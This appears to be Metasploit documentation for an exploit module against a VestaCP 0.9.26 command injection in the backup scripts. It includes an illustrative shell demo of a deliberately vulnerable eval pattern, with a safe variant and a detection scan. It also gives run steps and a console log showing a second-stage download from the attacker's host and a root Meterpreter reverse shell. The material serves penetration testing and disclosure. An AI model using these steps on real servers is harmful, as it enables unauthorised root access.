Vulnerable Application
This module exploits a command injection vulnerability in the v-list-user-backups bash script. Low-privileged authenticated users can execute arbitrary commands in the context of the root user.
An authenticated attacker with low privileges can inject a payload into a file name that starts with a dot. During the user backup process, this file name is evaluated by the v-backup-user bash script. As a result of that backup run, the injected payload is executed when the attacker lists the existing backups.
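The following is an added illustration of the bug class described above, written for this page; it is not VestaCP's v-backup-user or v-list-user-backups code. It builds a throwaway home directory containing a dotfile whose name carries a command substitution, shows that a lister which re-parses file names with eval runs the command, shows the safe plain-assignment form that does not, and ends with a scan a defender can run over user home directories for names containing shell metacharacters. The directory layout, file names and function names are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not VestaCP code: why a backup script that re-parses dotfile
# names with eval executes a command hidden in the name, the safe variant, and
# a scan defenders can run over home directories. All names are constructed.

# Build a throwaway home directory: one harmless dotfile and one whose name
# carries a command substitution (the attacker-controlled "payload in the file name").
make_fixture() {
  dir=$(mktemp -d)
  touch "$dir/.normal"
  touch "$dir/.\$(touch pwned)"      # file literally named  .$(touch pwned)
  printf '%s\n' "$dir"
}

# VULNERABLE pattern: the file name goes back through the shell parser via eval,
# so $(...), backticks and ; inside the name are executed rather than printed.
list_backups_vulnerable() (
  cd "$1" || exit 1
  for f in .*; do
    case "$f" in .|..) continue ;; esac
    eval "name=$f"            # BUG: re-evaluates attacker-controlled data
    printf '%s\n' "$name"
  done
)

# SAFE pattern: the name stays data. A plain assignment and a quoted expansion
# never hand it to the parser again, so the name is printed verbatim.
list_backups_safe() (
  cd "$1" || exit 1
  for f in .*; do
    case "$f" in .|..) continue ;; esac
    name=$f
    printf '%s\n' "$name"
  done
)

# Defender check: report entries whose names contain shell metacharacters that
# have no business in a legitimate backup or configuration file name.
find_suspicious_names() (
  cd "$1" || exit 1
  for f in .* *; do
    case "$f" in .|..) continue ;; esac
    [ -e "$f" ] || continue   # an unmatched glob is left literal; skip it
    case "$f" in
      *'$('*|*'`'*|*';'*|*'|'*|*'&'*|*'>'*|*'<'*) printf '%s\n' "$f" ;;
    esac
  done
)

demo() {
  d=$(make_fixture)
  echo "suspicious names in $d:"; find_suspicious_names "$d"
  list_backups_safe "$d" >/dev/null
  [ -e "$d/pwned" ] || echo "safe lister: name printed, nothing executed"
  list_backups_vulnerable "$d" >/dev/null
  [ -e "$d/pwned" ] && echo "vulnerable lister: 'pwned' created, command in file name ran"
  rm -rf "$d"
}
demo
```

The scan is a heuristic: it flags `$(`, backticks and the common list/redirection operators, which is enough to catch the dotfile the fixture creates but will not catch every payload encoding, so treat a hit as a reason to inspect the account rather than as proof of compromise.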
Installing the Vulnerable Application on Ubuntu 18.04 LTS
You can install Vesta Control Panel on an Ubuntu 18.04 LTS server with the following commands.
ssh root@your.server
curl -O http://vestacp.com/pub/vst-install.sh
bash vst-install.sh
Once you have finished the installation, perform the following actions in order to create an unprivileged user.
1 - Go to https://IP_ADDR:8083/
2 - Log in with your administrator account.
3 - Click the "User" section under the top navigation menu. When you move your mouse over the "User" text, it turns orange. That is the link you need to click.
4 - You should now be on the https://IP_ADDR:8083/list/user/ page.
5 - Click the green plus sign on the left side. When you hover over it, it says "ADD USER".
6 - You now see the user creation form. The "user, password, email, first name, last name" fields are required. Leave the package and language options as they are; they do not affect exploitation.
7 - Log out of your admin account.
8 - Go back to the URL from the first step.
9 - Log in with the unprivileged user to confirm the account works.
Verification Steps
The target must be able to reach SRVHOST:SRVPORT, because the first stage downloads the second-stage payload from that URL, and LHOST, because the session calls back to the reverse handler. A successful check of the exploit will look like this:
- Start msfconsole
- use exploit/linux/http/vestacp_exec
- Set RHOSTS
- Set LHOST
- Set USERNAME
- Set PASSWORD
- Set SRVHOST
- Set SRVPORT
- Run exploit
- Verify that you see "Successfully authenticated to the FTP service" in the console.
- Verify that you see "The file with the payload in the file name has been successfully uploaded." in the console.
- Verify that you see "Successfully authenticated to the HTTP Service" in the console.
- Verify that you see "Scheduled backup has been started !" in the console. Exploitation may take up to 5 minutes.
- Verify that you see "It seems there is an active backup process ! Recheck after 30 second. Zzzzzz..." in the console; this line repeats while the backup is running.
- Verify that you see "First stage is executed ! Sending 2nd stage of the payload" in the console.
- Verify that you get a Meterpreter session.
Ubuntu 18.04 LTS with VestaCP 0.9.26
msf5 > use exploit/linux/http/vestacp_exec
msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
RHOSTS => 192.168.74.218
msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
USERNAME => user11
msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1
SRVHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
SRVPORT => 8081
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started !
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300
msf5 exploit(linux/http/vestacp_exec) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > shell
Process 42978 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
meterpreter > shell
[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3
#